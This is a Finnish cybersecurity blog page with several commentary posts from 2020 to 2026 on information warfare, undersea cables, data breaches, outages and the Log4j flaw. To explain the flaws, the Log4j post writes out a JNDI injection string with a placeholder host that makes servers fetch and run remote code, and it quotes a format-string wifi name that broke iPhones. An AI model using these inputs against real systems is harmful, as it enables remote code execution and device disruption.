Näytetään tekstit, joissa on tunniste kyberturvallisuus. Näytä kaikki tekstit
Näytetään tekstit, joissa on tunniste kyberturvallisuus. Näytä kaikki tekstit

maanantai 4. toukokuuta 2026

Millainen voisi olla informaatiopuolustuksen keskus?

Lukutaito ja hyvä peruskoulu on ollut suomalaisen yhteiskunnan tukijalka. Se on antanut turvaa ulkomaista vaikuttamista vastaan, ainakin juhlapuheissa.

Lukutaito - informaatiopuolustuksen suojamuuri.

Totuus on, ettei Suomen vastustuskykyä ole vielä edes testattu. Venäjän trollit ovat kirjoitelleet someen hassuja viestejä, mutta Venäjän huomio on keskittynyt niihin maihin, joissa vaikuttamisella on oikeasti merkitystä: Saksa, Ranska, Italia.

Suomessa on paljon venäläistaustaisia ja maalle myötämielisiä ajattelijoita, mutta epäluulo Venäjää kohtaan istuu niin syvässä, etteivät someviestit riitä vaikuttamaan enemmistön ajatteluun.

Vaikuttamista tekevät toki muutkin valtiot. Ainakin Israelin ja Yhdysvaltojen kannat puskevat hyvin esille sosiaalisessa mediassa. Toiminta on koordinoitua, ainakin ruohonjuuritasolla, sillä tunnettujenkin supisuomalaisten kirjoittajien viestit ovat kuin kopioita toisistaan. 

Entä jos Suomi joutuu oikeasti informaatiohyökkäyksen kohteeksi? Pitäisikö Suomella olla informaatiopuolustuksen keskus tai jopa virasto? Arja Paananen kirjoitti aiheesta 1.5.2026 Ilta-Sanomissa. Aiemmin asiaa ovat nostaneet esille ainakin Janne Riiheläinen sekä Euroopan ulkosuhdehallinnon asiantuntija Pekka Kallioniemi

Paanasen kirjoituksen ydin on siinä, että tekoälyn avulla vihamieliset tahot voivat kohdistaa Suomeen laajoja vaikutuskampanjoita, jotka naamioidaan suomalaisten omaksi mielipiteeksi:

Mutta yhtä lailla Suomen oman it-osaamisen ja tekoälyn avulla näiden viestien alkulähteet voitaisiin saada selville, niiden motiivit paljastaa ja ennakoida tuleviakin hyökkäyksiä.

Näin on varmasti jo tapahtunut. Uhkaa kannatta pohtia, mutta onko uuden keskuksen tai viraston perustaminen oikea ratkaisu? Organisaatioita meillä on jo turhankin paljon.

Yleisellä tasolla jokaisen organisaation tavoitteena on tehdä itsestään tarpeellinen ja suojella omaa olemassaoloaan. Ylen iltaisissa ajankohtaisohjelmissa vierailevat samat kasvot varoittamassa erilaisista uhkakuvista. Pahimmillaan uhkapuhe vain lisää koettua uhkaa.

Esimerkiksi hybridiuhkista ja Venäjän Suomessa vesitorneihin ja radiomastoihin tekemistä sabotaaseista on varoitettu pitkään, mutta tietääkseni yhtään varmistettua tapausta ei ole tuotu julkisuuteen. Tapaus HAV Dolphin jäi kohusta huolimatta suutariksi, eikä muista Venäjän toimista löytynyt todisteita (HS 17.12.2025):

Suomen poliisi kertoi äskettäisessä taustatilaisuudessa, että se on tutkinut ja selvittänyt viime vuosina lukuisia hybridivaikuttamiseksi epäiltyjä tapauksia. Yhdenkään tapauksen taustalta ei ole kuitenkaan paljastunut valtiollista toimijaa.

...

Poliisin tutkimissa vesi-, sähkö- ja teleinfrastruktuuriin liittyvissä epäilyttävissä tapauksissa taustalta on taas paljastunut muun muassa omaisuusrikollisuutta, ilkivaltaa ja niin sanottua urbaania löytöretkeilyä. Poliisin havainnot herättävät kysymyksiä: Kouhkataanko meillä hybridivaikuttamisesta liikaa? Ja jos kouhkataan, niin miksi, mitä siitä seuraa ja mitä asialle pitäisi tehdä?

Supon entinen tutkija Saana Nilsson kuvasi samaa asiaa kirjassaan

– Sen jälkeen supon arviot eivät olleetkaan tarpeeksi uhkaavia. Meiltä olisi kaivattu raflaavampia arvioita, lisää pelottelua ja lisää uhkakuvia. Nilsson arvostelee sitä, ettei Suomessa osattu lopettaa pelkäämistä edes Nato-jäsenyyden myötä. Hän koki näkemysten mustavalkoistuvan: joko tuit puolustusmenojen lisäämistä tai olit Putinin puolella. Nilsson kertoo kirjassaan, kuinka supossa hämmästeltiin sitä, miten julkisessa keskustelussa Venäjä löydettiin syylliseksi niin kaapelirikkoihin kuin vesilaitosmurtoihin ilman mitään todisteita.

Mutta jos keskus katsotaan tarpeelliseksi ja perustetaan, miten sen tulisi toimia jos tekoäly havaitsee toisen tekoälyn pommittavan Suomea viesteillään? Lisää puhuvia ja varoittelevia päitä A-Studioon? Oma tekoäly vastaamaan someen samalla mitalla? Viranomainen selvittämään, kuka ulkomaista myönteisesti kirjoittava on oikea henkilö ja kuka botti, tai jäljittämään ohjeiden antajaa?

Tämä on monitahoinen asia, jossa hötkyily voi vain pahentaa tilannetta ja vähentää kansalaisten luottamusta. 

Millainen sinun mielestäsi informaatiopuolustuskeskuksen pitäisi olla?

torstai 17. huhtikuuta 2025

Varautumisen suurvalta digiajassa (kolumni)

Suomi on varautumisen suurvalta. Siihen meitä on opettanut historia ja maantiede: pieni pohjoinen maa, ankarat olosuhteet ja pitkä etäisyys Eurooppaan, missä kaikki tärkeä tapahtuu.

Etäisyyttäkin kriittisempää on Suomen sijainti Venäjän naapurissa. Jos jotain ikävää sattuu, Suomesta tulee saari. Maata pitkin meiltä pääsee vain kahteen muuhun pohjoismaahan, jotka nekin ovat käytännössä saaria.

Norjalla on sentään pitkä rannikko suoraan aavalle Atlantille, Ruotsilla nykyään silta Tanskaan ja suora pääsy Pohjanmerelle. Suomen rannikko on ikävästi pussin perällä.


HISTORIAN OPETTAMANA Suomi on panostanut yksin pärjäämiseen ja varautumiseen. Huoltovarmuuskeskus tekee monialaista yhteistyötä yritysten ja organisaatioiden kanssa, jotta kriittisistä tarvikkeista saadaan pidettyä varmuusvarastoja Suomen maaperällä.

Digiaikana varautuminen asettuu ihan uuteen valoon. Toisaalta Suomi ei enää ole peräkammarissa, vaan yhtä keskellä kuin muutkin. Toisaalta juuri siksi tietoliikenne tekee meistä entistä riippuvaisempia.

Internetiä ei voi varmuuskopioida. Arki ja hyvinvointi riippuvat reaaliaikaisista, nopeista datayhteyksistä. Tiedot ovat pilvessä, mutta niistä ei ole mitään iloa ilman kaapeleita, jotka Suomen tapauksessa kulkevat meren pohjassa.

Mikä pahinta, merikaapelit kulkevat kansainvälisillä vesillä, joka on ei-kenenkään-maata. Emme psyty varmistamaan niiden turvallisuutta sopimuksilla emmekä edes omilla sotalaivoilla.


SUOMESSA TAPAHTUU outoja asioita. Pari vuotta sitten uutisoitiin, miten joku murtautui sähkökaappeihin ja vesitorneihin, mutta ei varastanut mitään. Janakkalassa kaadettiin iso telemasto.

Yhtäkkiä murrot loppuivat, tai ainakaan niistä ei enää uutisoitu. Kukaan ei kerro, mitä tutkinnassa saatiin selville. Oliko kyse pelkästä ilkivallasta vai oliko taustalla vieraan valtion vaikuttamista?

Sitten kiinalaisten alusten ankkurit alkoivat raahautua pitkin merenpohjaa katkoen Suomelle tärkeitä sähkö- ja datakaapeleita. Varjolaivaston heikkoa merimiestaitoa vai kieroa vaikuttamista?

Kukaan ei taaskaan tiedä, mutta sillä ei oikeastaan ole merkitystä. Merikaapelit ovat Suomelle Akilleen kantapää, jonka vakavuus on kunnolla ymmärretty vasta Ukrainan sodan myötä.


USEIN KUVITELLAAN, että koska internet on alusta pitäen suunniteltu vikasietoiseksi, liikenteen reitittäminen kaapelista toiseen on helppoa. Ei ole.

Yksittäisen kotisurffarin ip-paketit voidaan kyllä kääntää linjalta toiselle, mutta kun kyse on satojen gigabittien runkoverkosta, yhteyksiä ei niin vain reititetä uudelleen.

Kiitos operaattorien yhteistyön tähänastisista katkoista on selvitty vähällä, mutta entä jos valtiollinen toimija kyntää merenpohjaa tarkoituksella ja katkoo useita kaapeleita?

Korjaustöihin pystyviä aluksia on vähän ja niiden pääsy paikalle voidaan estää. Pahimmassa tapauksessa Digi-Suomi putoaisi takaisin 1980-luvulle, mutta tällä kertaa ilman papereita ja manuaalisia prosesseja.

Operaattorit ovat rakentaneet runkoverkkonsa hyvän sään aikana kustannuksia optimoiden, eikä työssä ole mietitty kriisiaikoja. Yritykset ovat ikuisia optimisteja.


MERIKAAPELIEN LISÄKSI pitäisi rakentaa maakaapeleita. Ei ole julkista tietoa, millaisia maakaapeleita kulkee Tornion kohdalla maidemme välillä, mutta niitä tarvitaan joka tapauksessa lisää.

Ongelma sielläkin taitaa olla se, että myös Ruotsin sisäinen verkko on kustannusoptimoitu, eivätkä yhteydet pohjoisesta etelään nykyisellään kestäisi Suomen tuomaa lisäliikennettä.

Voimme parantaa digitaalista omavaraisuutta keskittämällä palveluita Suomessa sijaitseviin datakeskuksiin. Mitä enemmän saamme maahan ulkomaisia isoja toimijoita, sitä suurempi intressi niillä on suojata Suomeen meneviä yhteyksiä. Kaapelit sitovat Suomen kirjaimellisesti länteen.


ON SYYTÄ KATSOA myös ylöspäin. Vaikka Elon Musk on varastanut kaiken huomion omalla StarLink-verkollaan, taivaalla lentää myös eurooppalainen Eutelsat-järjestelmä. Se myy satelliittiyhteyttä suoraan yrityskäyttöön.

Satelliittiyhteys on tarpeellinen varajärjestely, mutta yksin sen varaan ei voi rakentaa. Kysykää vaikka kotitalouksilta, joihin Suomessa vedetään valokuitua ennätystahtia.

In cable we trust.

Julkaistu Tivi-lehdessä 4/2025.

maanantai 7. huhtikuuta 2025

Ulkoministeriön outo tietomurto

Runsas viikko sitten silmiin osui erikoinen uutinen Ylellä: "Ulkoministeriössä epäillään tietomurtoa".  

Tivin uutinen avaa tapahtunutta tarkemmin (suora lainaus): "Ulkoasiainhallinnon käyttämä etäyhteyspalvelu oli jo viime vuoden puolella todettu haavoittuvaksi, minkä vuoksi ulkoasiainhallinto otti käyttöön tehostetun tietoturvavalvonnan ja aloitti siirtymisen korvaavaan palveluun."

Haavoittuvaksi tiedetty VPN oli Ivantin Pulse Secure. Traficom onkin tiedottanut tammikuun alussa Ivantin muista tuotteista löytyneistä haavoittuvuuksista, jotka ilmeisesti liittyvät asiaan.

Erikoiseksi asian tekee se, että Ulkoministeriössä otettiin tietoinen riski ja jatkettiin haavoittuvan järjestelmän käyttöä, koska ilman VPN-yhteyksiä ei voitu olla. Rinnalla aloitettiin siirtymä uuteen, turvalliseen järjestelmään.

Tehostetusta valvonnasta huolimatta tietomurto onnistui, mutta ilmeisesti havaittiin pian. Siitä on tehty ilmoitus tietosuojavaltuutetulle ja KRP tutkii asiaa. Jotain siis ehti tapahtua?

Uutinen herättää kysymyksiä. Jos VPN tiedettiin haavoittuvaksi, eikö sitä voitu päivittää turvalliseksi? Kestikö Ivantilta korjauksen tekeminen niin kauan, jos ongelma kerran oli tiedossa? Tietoisesti haavoittuvan VPN:n käyttö on iso riski, jota tarkempi valvontakaan ei pysty poistamaan. Miten käyttöön on valittu toimittaja, joka ei pysty korjaamaan haavoittuvuuksia riittävän nopeasti?

Lisäksi UM:n tietohallintojohtaja toteaa jutussa "Tietomurtoa ei odotettu, mutta siihen oli varauduttu."

Näinä kriisiaikoina Suomen ulkomaantoiminta varmasti herättää kiinnostusta ainakin Kiinassa ja Venäjällä. Tietomurtoja yritetään varmasti koko ajan, vai joko UM:n verkosta 2013 löytyneet vakoiluohjelmat ovat päässeet unohtumaan? Entä parin vuoden takainen Pegasus-vakoiluohjelma puhelimissa? Tietomurtoja nimenomaisesti pitäisi odottaa. 

Luultavasti tapahtuneessa on jotain, mitä ei julkisesti uutisoida. Tällaisena uutinen kuitenkin hämmentää lukijaa. Ehkä KRP aikanaan kertoo, mitä se sai selville.

keskiviikko 30. maaliskuuta 2022

Ensin ilman korttimaksuja, sitten ilman sähköä - havaintoja kantapään kautta

Venäjän hyökkäyksen jälkeen uutiset ovat herkistäneet kansalaisten mielen odottamaan häiriöitä. Ja kun häiriöitä odottaa, niitä näköjään myös tulee.

OSA I - pankkikortti ei toimi

Muutama viikko sitten suuren espoolaisen kauppakeskuksen K-Citymarketissa tapahtui häiriö, joka mykisti sähköiset maksut. Tulin paikalle vasta, kun ovia avattiin uudelleen, mutta ilmeisesti iso kauppa oli pantu hetkeksi kokonaan kiinni.

Kaiuttimista kuulutettiin, että varmuudella vain käteismaksut toimivat. Itsepalvelukassat oli tietenkin suljettu, ihmiset jonottivat perinteisille kassoille. Harvalla näytti enää olevan käteistä, joten ostoksia hylättiin kassan lähelle.

Kun systeemit eivät toimi, cash is king.

Ja toden totta, "Tapahtuma hylätty, Poista kortti" ilmestyi maksupäätteeseen, kun yritin aluksi maksaa puhelimen lähimaksuna ja sen jälkeen pankkikortilla. Onneksi itsellä sattui olemaan 50 euron seteli, jolla sain ostokseni kuitattua. 

Myöhemmin Länsi-Uudenmaan pelastuslaitos tiedotti, että kauppakeskuksessa oli ollut "rakennuspalo: keskisuuri, pelastuslaitos tuulettaa tiloja". Onneksi kassajärjestelmä kuitenkin toimi, jolloin ne pystyivät ottamaan vastaan käteistä ja antamaan vaihtorahaa.

Pahempi tilanne olisi kassajärjestelmän kaatuminen tai laaja sähkökatko. Silloin kauppa ei voisi myydä edes käteisellä. Olemme todella tekniikan vankeja.

Moni haluaisi siirtää kaikki toiminnot puhelimeen ja päästä kokonaan eroon lompakosta. Huoltomekaanikko Aki Yrttiaho kertoi vuonna 2019 Ilta-Sanomien haastattelussa, että pyrkii hoitamaan kaiken puhelimella eikä pidä mukanaan senttiäkään käteistä. Hän ennakoi pystyvänsä luopumaan lompakosta vuoden kuluttua.

Kaikeksi onneksi kauppakeskuksessa on molempien keskusliikkeiden kaupat, käytävän toisella puolella olisi voinut maksaa myös sähköisesti. Tällä kertaa kukaan ei siis jäänyt nälkäiseksi. Ei edes Aki Yrttiaho, jos sattui kauppaan juuri katkon hetkellä. Ensi kerralla voi olla huonommin.

OSA II - sähkökatko

Tänään 30.3.2022 tasan klo 12.00 Otaniemen alueella alkoi laaja sähkökatko. Vastaavaa ei ole ollut koskaan ennen. Carunan tiedotussivu näytti nopeasti useita vikakohteita.

Carunan vikasivu.

Sähkökatkossa ei ole mitään ihmeellistä, mutta kun sellainen näinä aikoina sitten tapahtuu, tulee mieleen monia ajatuksia. 

Ensimmäinen reaktio oli yllätys, sitten harmitus. Vaikka välitallennusten tekeminen on selkäytimessä, muutama tekstipätkä hävisi Powerpointin ja Windowsin kadotessa alta.

Sitten tuli hiljaisuus. Niin kova hiljaisuus, että se sattui korviin. Ilmanvaihdon humina, tietokoneiden hurina ja arkipäiväiset äänet, joihin emme normaalisti kiinnitä huomiota, häviävät yhtäkkiä ja jäljelle jää vain kovaääninen hiljaisuus. Se on sekä pelottavaa että vapauttavaa.

Onneksi nykyään on älypuhelimet. Tukiasemissa riittää virtaa muutamaksi tunniksi, joten nettiyhteys sen kautta toimi. Myös läppärin sai toimimaan puhelimen avulla. Silti työn tekeminen loppui.

Suuri toimistotalo hiljeni kerralla, ja myös pimeni. Vihreät hätävalot toimivat, samoin käytävien sähkölukot, mutta neuvotteluhuoneet jäivät lukkoon. Ravintola pimeni, mutta ihmiset saivat ruokaa kirjoittamalla tietonsa kynällä paperille. Onneksi oli päivä, joten aulassa ja ravintolassa riitti runsaasti luonnonvaloa. Pimeällä tilanne olisi ollut vaikea.

Käyhän se näinkin: nimi paperiin ja maksu myöhemmin. 

Katkosta tuli 48 minuutin mittainen, sitten sähköt palasivat. 

Toimistotalossa on erikseen "ATK-pistokkeet", joiden sähkön pitäisi olla UPSin takana. Ne laitteet lähtivät toimimaan vasta 22 minuuttia toimistosähköjen palautumisen jälkeen. Yhteensä työhön tuli siis 1 h 10 minuutin totaalinen katkos.

Muutamia oppeja ja ajatuksia:

  • Pidä vähän käteistä pieninä seteleinä. Liian suuret summat ovat jo itsessään turvallisuusriski. Varaudu siihen, ettei pahan sähkökatkon aikana käteinen kelpaa kaupoissa.
  • Pidä läppärin ja puhelimen akut ladattuina.
  • Älypuhelimen taskulamppu on todella hyödyllinen, jos käytävät ovat pimeät. Tarkista, mistä lampun saa päälle. 
  • Kokeile, pääsetkö alas kerroksista ilman hissiä. Korkeissa rakennuksissa tai liikuntaesteiselle asia ei ole ihan yksinkertainen.
  • Hätätapauksessa puhelinta voi ladata autossa, samoin analogisesta autoradiosta voi kuunnella vaaratiedotteita ja suojautumisohjeita.
  • Jos katko kestää useamman tunnin, tukiasemien akut sammuvat ja silloin alkavat todelliset ongelmat. Siksi veivattavista generaattoreista ei ole paljon iloa puhelimen lataukseen.
  • Myös hissien hälytyspuhelimet mykistyvät muutaman tunnin jälkeen. Niiden akut loppuvat ja hissit alkavat lähettää ilmoituksia keskukseen tukkien sen.
  • Selvitä oman sähkönsiirtoyhtiösi nimi ja vikatiedotesivun osoite. On hyvä tietää, kuinka laajasta katkosta on kyse ja yhtiön arvio sen kestosta.
  • Täydellinen hiljaisuus alkaa käydä hermoille, varsinkin jos siihen liittyy epävarmuus tulevasta tai esimerkiksi talviaikaan pelko tilojen kylmenemisestä. 
  • Odottavan aika on pitkä.
Sitten vain toivotaan, että kyberturvallisuus on kunnossa, eikä tähän listaan koskaan jouduta turvautumaan.

tiistai 8. maaliskuuta 2022

Kansalaisen informaatiopuolustus

Ukrainan traaginen sota on liimannut meidät suomalaiset netin ääreen ja saanut monet ahdistumaan omasta voimattomuudestaan. Pahempaa voi olla tulossa. Siksi muutama sana jokahenkilön informaatiopuolustuksesta.

Ensinnäkin tietoturva kuntoon. Tästä on puhuttu jo kyllästymiseen asti, mutta jos tiedät, että käytät jossain heikkoja salasanoja, kotiverkko on huonosti suojattu, kodin wifi-reititin päivittämättä tai yrityksen tietoturvakoulutus järjestämättä - nyt on viimeinen hetki hoitaa asia kuntoon.

Kyllä, myös kotiverkot. Digitaalisessa maanpuolustuksessa olemme kaikki etulinjassa. 

Anonymous-hakkeriryhmä on iskenyt Venäjälle ja tehnyt säröjä maan sensuurin muuriin. Pietarin pelätty trollitehdas on tähän asti joko talvilomalla tai keskittynyt kotimaansa "palvelemiseen", mutta jonkinlainen vastareaktio on varmasti tulossa. 

Venäläiset ovat hyökkääjiä, joten heillä ei ole uskottavaa tarinaa, jota he voisivat levittää länteen. Propagandan sijaan tulossa voi olla eripuran ja pelon lietsontaa. Siihen kannattaa varautua. 

Sodassa aseena on aina myös väärän tiedon levittäminen ja sen torjunta. Tässä sodassa sosiaalinen media on osoittanut mahtinsa, mutta sekään ei ole ongelmatonta. Älä jaa yhtään some-päivitystä eteenpäin ennen kuin olet pohtinut sen luotettavuutta. Hyvissä uutisissa houkutus on suuri, joten harkinnan säilyttäminen vaatii malttia.

Sisäinen riitely: nyt ei ole oikea aika pilkata ketään takinkääntäjäksi tai arvostella puolueiden vanhoja lausumia. Maailma on muuttunut, eikä vanhoilla virheillä ole nyt merkitystä. Pilkan sijaan tarvitsemme talvisodan yhteishenkeä. Arvioidaan vanhat synnit sitten, kun tilanne on rauhoittunut ja pöly laskeutunut. Nyt katsotaan eteenpäin.

Meillä on myös omat kotimaiset desanttimme, jotka pyrkivät vääristämään tilannekuvaa ja pelottelemaan ihmisiä. Johan Bäckmanin suoritus tällä alalla on kerrassaan hämmentävä. Twitter-viesteissään hän on uhkaillut, miten suomalaisille toimittajille opetetaan kohta käytöstapoja, ja miten Venäjän asevoimien kunnian (minkä?!) loukkaaminen on vakava rikos, joka koskee myös Suomen valtamedian toimittajia. Bäckman toimii vieraan maan puolesta tavalla, josta Venäjällä saisi välittömästi vankeutta.

Tulemme todennäköisesti kokemaan myös tietoturvahyökkäyksiä: kiristysohjelmia ja palvelunestoja. Viime viikolla Nordeaa vaivannut pitkäkestoinen palvelunestohyökkäys oli esimakua siitä, mitä voi olla tulossa.

Nordean verkkopankki etanan vauhdissa.

Verkkomaksut menivät läpi, mutta hitaasti ja vaativat useamman yrityksen.

Tuore uutinen kertoo, etteivät reittikoneet Savonlinnaan ole pystyneet laskeutumaan GPS-häiriöiden vuoksi. Kouvolan seudulla ilmenevä häiriö estää koneen lähestymisen Savonlinnan kentälle. Venäjä on häirinnyt GPS-yhteyksiä sotaharjoitustensa yhteydessä, joten epäilykset kohdistuvat nytkin siihen. Kyse voi olla Utin tai Vekaranjärven omasta toiminnasta, tai laittoman häirintälähettimen hankkineesta yksittäisestä kansalaisesta. 

Epävarmuudesta huolimatta kannattaa pitää pää kylmänä ja välttää hätäisiä johtopäätöksiä. Kaikki epäilyttävä ei johdu Venäjän toiminnasta. 

Eilen minulta kysyttiin, onko Venäjä iskenyt pääkaupunkiseudun Reittioppaaseen, koska se näytti Helsingistä olemattomia venäläisiä kadunnimiä. 

Vladimirinkatu, Helsinki

Kyse ei kuitenkaan ole informaatio-operaatiosta, vaan vanhoista kadun nimistä, jotka bugin vuoksi tulevat näkyviin HSL:n palvelussa. Toisaalta, juuri tällaisia temppuja saatamme jatkossa nähdä.

Jos koordinoit Ukraina-myönteistä toimintaa, kuten mielenosoituksia tai keräyksiä, älä tee sitä yksinomaan Facebookissa. Sen sivut voivat sulkeutua milloin tahansa tietoturvahyökkäyksen tai valheellisen ilmiannon vuoksi. Perusta sivut jollekin blogialustalle ja vain mainosta niitä Facebookissa. 

Lopuksi kannattaa vielä muistuttaa omasta henkisestä kestämisestä. Vaikka voimattomuus ahdistaa ja ihmisiä kuolee, elämä jatkuu muualla. Toivoa ei ole menetetty. Liiallinen doomscrolling (huonojen uutisten ahmiminen) lisää omaa pahoinvointia, mutta ei auta mitään. Sulje uutiset ja huolehdi sekä omasta että lähipiirin jaksamisesta. Vaarassa ovat varsinkin lapset ja nuoret, joilta ilmastonmuutos, kahden vuoden koronaeristys ja nyt lähelle tuleva sota uhkaavat viedä tulevaisuudenuskon ja elämänilon. Silloin Venäjä olisi voittanut meidätkin.

Tämä ei ole vielä ohi, ei lähimainkaan.

Lisäys klo 20.50: Spotify ei toimi. 

Spotify ei toimi, ei web eikä sovellus.

Mielenkiintoista. Stay tuned.

Lisäys 9.3.2022: Monien palveluiden yhtäaikaiset ongelmat johtuivat ilmeisesti Googlen pilven kuormantasausjärjestelmän ongelmista. Tämäkään ei siis ollut pelätty kyberhyökkäys länttä vastaan.

sunnuntai 12. joulukuuta 2021

Esimakua kyberpandemiasta

Turvallisuusalalla on pitkään spekuloitu kyberpandemian mahdollisuudella. Heräämmekö jonain päivänä maailmaan, jossa tietomurrot tai haittaohjelmat riivaavat kaikkia järjestelmiä saaden yhteiskunnan ja kansalaisten arjen sekaisin?

Tänä viikonloppuna on saatu esimakua kyberpandemiasta. Syynä on Log4j-niminen Java-komponentti, jota käytetään monissa nettipalveluissa. Ohjelmassa on ominaisuus, joka mahdollistaa yksinkertaisen hyökkäyksen: välittämällä palveluun yksinkertainen merkkijono palvelin saadaan hakemaan mistä tahansa nettiosoitteesta koodia, joka suoritetaan saman tien. 

Haavoittuvuuksia on ollut aina, mutta Log4j on omaa luokkaansa. Sitä ei ole turhaan sanottu vuosisadan pahimmaksi tietoturva-aukoksi. Kyseessä ei ole varsinainen bugi, vaan pikemminkin suunnitteluvirhe, jota kukaan ei ole tiettävästi aiemmin huomannut käyttää hyödyksi.

Aiempi OpenSSL-haavoittuvuus, suomalaisten löytämä Heartbleed (2014), vaikutti laajalle ja havahdutti huomaamaan avoimen lähdekoodin ongelmat. Sen hyödyntäminen oli kuitenkin hankalaa ja vaati teknistä osaamista. Log4j on aivan toista maata: riittää, että vaihtaa selaimen tai puhelimen merkkijonoksi ${jndi:ldap://url-osoite-tähän/a} ja kertoo, mistä osoitteesta hyökkäyskoodi haetaan. Lapsikin sen osaa. Jopa tämä blogiteksti saattaa laukaista koodin hakuyrityksen, joskin url-osoite-tähän on osoitteena vaaraton.

Hieman vastaavia ongelmia on ollut aiemminkin iPhone-puhelimissa. Kesällä uutisoitiin, miten iPhonen verkkoasetukset hajoavat, jos puhelimella liittyy %p%s%s%s%s%n -nimiseen wifi-verkkoon. Edes puhelimen uudelleenkäynnistys ei auta. Aiemmin puhelimen on voinut sammuttaa lisäämällä tekstiviestiin tietyn merkkiyhdistelmän.

Nyt Log4j:n vaarallinen ominaisuus on korjattu, mutta korjausten asentaminen kaikkiin haavoittuviin järjestelmiin on jättimäinen työ. Kyse ei ole pelkistä nettipalveluista, vaan Log4j-komponenttia on tavattu myös erilaisista elektroniikkalaitteista. Suurin osa palveluista ei edes tiedä, että jossain koneiston uumenissa on haavoittuva palanen. Se selviää vain kokeilemalla, miten palvelu vastaa hakkerointiyritykseen.

Täsä Githubin listasta saa jonkinlaisen aavistuksen ongelman laajuudesta. 

Nykyiset tietojärjestelmät koostuvat sadoista komponenteista, joista suurin osa on nettiyhteisön kehittämiä tai ylläpitämiä. Niitä pinotaan päällekkäin ja rinnakkain ilman, että kukaan tietää, mitä haavoittuvuuksia pinoon jää. "Avoin lähdekoodi on turvallista, koska kuka tahansa voi nähdä virheet" on vanha mantra, joka ei pidä enää paikkaansa. 

Kaikki käyttävät vapaita ohjelmia -- toisten kirjoittamaa koodia -- eikä kukaan vastaa kokonaisuudesta. Kriittistä koodia saattaa ylläpitää joku yksittäinen henkilö oman työnsä ohella, tai sitten sitä ei ylläpidä enää kukaan. Log4j:n ylläpidosta huolehtii tiettävästi kolme tai neljä henkilöä, ja hekin vain vapaa-ajan projektina. Silti miljoonat ihmiset ja laitteet käyttävät heidän ilmaistyötään.

Tapahtuma herättää kysymään, millaisia pommeja nettipalveluissa piilee? Kuka löytää ne ensimmäisenä - rosvot, tiedustelupalvelut vai valkohattuhakkerit? Tämä viikonloppu ainakin on IT-ylläpidon painajainen. Luultavasti ensi viikolla tulemme näkemään monia tietomurtoja ja vahingontekoja. Joululomat on peruttu muiltakin kuin teho-osaston hoitajilta.

On ollut kiinnostavaa seurata Suomen uutisointia asiasta. Maailmalla Log4j on iso uutinen, "internet is on fire!". Suomessa sen ovat noteeranneet Ilta-Sanomat, Iltalehti ja Helsingin Sanomat. Yle ei vielä tähän mennessä ole reagoinut. It-maailmaa ymmärtäviä toimittajia on vähän, eikä heitä ole viikonloppuisin vuorossa. Tivi-lehti kirjoitti asiasta jo perjantaina, jolloin vakavuudesta ei ollut vielä täyttä selvyyttä. Tilanteen vaarallisuus on paljastunut vasta viikonlopun kuluessa. 

Voi vain toivoa, että jos kyberpandemia joskus iskee, se ei ala ainakaan viikonloppuna.

Lisäys 14.12.2021: Vaaralliseksi osoittautunut ominaisuus lisättiin Apache Log4j-komponenttiin versiossa 2.0-beta9, joka julkaistiin 21.9.2013. Vaara huomattiin yli kahdeksan vuotta myöhemmin ja varoitus julkaistiin 9.12.2021. Siinä välissä kukaan ei huomannut asiaa tai ei ainakaan raportoinut siitä vaan käytti aukkoa itse tietomurtoihin. Mitähän muita pommeja järjestelmissä tikittää? 

JNDI injection -riskistä oli esitelmä Black Hat 2016 -konferenssissa, mutta puhujat eivät itsekään osanneet yhdistää uhkaa Apache Strutsiin. 

Nyt huolestuttavin skenaario on, että joku kirjoittaa haavoittuvuutta hyödyntävän madon. Se voisi levitä palvelimesta toiseen ja halvaannuttaa ison osan internetiä.

maanantai 28. joulukuuta 2020

Tietomurto eduskunnan sähköpostiin saa Suomen näyttämään lampaalta

KRP tiedotti tänään 28.12.2020 niukkasanaisesti tutkivansa eduskunnan tietojärjestelmiin kohdistunutta tietomurtoa. Media ehti jo otsikoida tapahtuman kyberhyökkäykseksi. Meille ei tietenkään kerrota mitään, mutta tasavallan presidentti Niinistön kommenteista päätellen ("kyberhyökkäys vakava loukkaus suomalaista demokratiaa vastaan") tapaus on harvinainen ja vakava.

Tietojen (tai pikemminkin niiden puuttumisen) valossa kyseessä on todennäköisesti samanlainen operaatio, joka kohdistui Norjan parlamentin sähköposteihin elokuussa, joka havaittiin syyskuussa ja tiedotettiin julkisuuteen lokakuun alkupuolella. Norjan salainen poliisi (PST, Police Secret Service - oletettavasti Supoa vastaaa taho) julkisti oman raporttinsa joulukuussa. Sen mukaan Norjaan kohdistunut teko oli osa laajempaa kampanjaa, jonka takana on Venäjän sotilastiedustelu ja sen APT28 ("Fancy Bear") -yksikkö. 

Tällaisia syytöksiä ei heitetä kevein perustein, joten Venäjän osuutta voidaan pitää käytännössä varmana. Ja Suomi reagoi kuten Venäjän toimiin aina: varovasti ja hiljaa.

Tästä eteenpäin oletan, että eduskuntaan kohdistuneen teon takana ovat samat tahot kuin Norjassa (ja Saksassa 2015). Mitään todisteita ei ole, mutta toisaalta eipä mikään todista myöskään päinvastaista. Kuten aina, KRP perustelee vaitonaisuutta tutkinnan turvaamisella. Perustelut kuulostavat jopa koomisilta: "...perustelee niukkaa tiedottamista tutkinnan turvaamisella. Tekijä todennäköisesti seuraa tiedotusvälineitä." Valtiollisen toimijan ei tarvitse seurata tiedotusvälineitä tietääkseen, miten tutkinta edistyy.

Tuskin on sattumaa, että tieto julkistettiin juuri tänään, kun suomalaisessa mediassa on vain minimimiehitys ja Venäjän lomakausi on juuri alkanut. Tarkemmin ajatellen päivämäärä voi olla jopa viesti Venäjälle: tiedämme kyllä, että te olitte asialla.

Norjan raportin mukaan kansanedustajien sähköpostin heikkoja salasanoja yritettiin murtaa ja näin päästä sisään järjestelmään. KRP ei kerro, oliko tämä tekotapana myös meillä ja millaista tietoa mahdollisesti saatiin. Toivottavasti kansanedustajien tietoturva on paremmalla tasolla kuin vuosia sitten, jolloin vuoti lista edustajien salasanoista. Ne olivat naurettavan helppoja. Eräskin tunnettu edustaja käytti salasanana tyttärensä etunimeä.

Kansanedustajien sähköposteja tärkeämpiä ovat sieltä avautuvat reitit muihin palveluihin ja syvemmälle verkkoon sekä pilvipalveluihin. Lisäksi teko on jo itsessään isku demokratiaa vastaan ja lietsoo  epäluottamusta, aivan kuten hyökkääjä toivookin.

Lokakuussa 2013 kerrottiin Ulkoministeriön verkosta löytyneestä vakoiluohjelmasta. Itse asiassa niitä oli useampia erilaisia. KRP on tutkinut asiaa nyt runsaat seitsemän vuotta, eikä ole tiedottanut mitään, koska virallisesti tutkinta on yhä kesken. Mediat ovat sentään kertoneet, että jäljet johtivat tässäkin itänaapuriin.

